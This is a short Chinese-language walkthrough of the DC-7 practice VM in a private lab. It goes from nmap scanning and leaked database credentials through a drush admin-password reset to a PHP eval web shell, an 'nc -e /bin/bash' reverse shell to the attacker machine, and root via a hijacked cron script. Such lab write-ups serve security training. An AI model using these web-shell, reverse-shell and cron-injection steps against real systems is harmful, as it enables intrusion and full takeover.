本机192.168.223.128
目标192.168.223.136
主机发现 nmap -sP 192.168.223.0/24
端口发现 nmap -sV -p- -A 192.168.223.136
开启了22 80端口 80端口apache服务
先进入web界面看一下
提示:DC7加了一些新的东西,让我看看盒子之外的东西,与DC系列前面几个靶机相比左下角多了个@DC7USER
百度搜一下有个github的链接
里面有个配置文件打开可以看到账户密码
servername = localhost
username = dc7user
password = MdR3xOgB7#dW
dbname = Staff
web界面登不上去,尝试用ssh连接
ssh dc7user@192.168.223.136
拿到shell
看一眼邮箱,好像有sql文件保存在当前用户的备份目录下
不过是以gpg结尾的,gpg加密文件,打开发现是一堆乱码,不知道怎么解密
再看一下当前用户下还有什么东西
有个mbox
打开发现执行了这个sh文件
找个这个sh文件看一下
注意到有个drush指令,drush是drupal里面的指令,可以修改一些配置文件
搜索发现可以修改密码,那就修改一下网页的admin用户密码看看
drush upwd admin --password=”123456”
成功登录
发现添加文章里面可以执行脚本文件
想 RCE但是没有PHP模块,发现拓展里面可以添加新模块
.php包
.https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
.
到扩展里面安装一下
写入一句话<?php eval($_GET[x]);?>
rce成功,这样就可以反弹shell
攻击机开启一个监听端口nc -lvvp 4567
rce执行 x=system(“nc -e /bin/bash 192.168.223.128 4567”);
拿到shell
切换到交互式shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
上面的脚本文件backups.sh是mbox的定时执行人任务,只要将反弹shell的指令写入到backups.sh,攻击机再开个监听端口,当定时任务执行的时候,我们就能拿到root权限
echo “nc -e /bin/bash 192.168.223.128 4567” >backups.sh
然后等就行了
等了一会弹回shell
总结:1.信息收集2.ssh登录 3.drush 修改密码4.drupal添加php拓展反弹shell5.定时任务反弹shell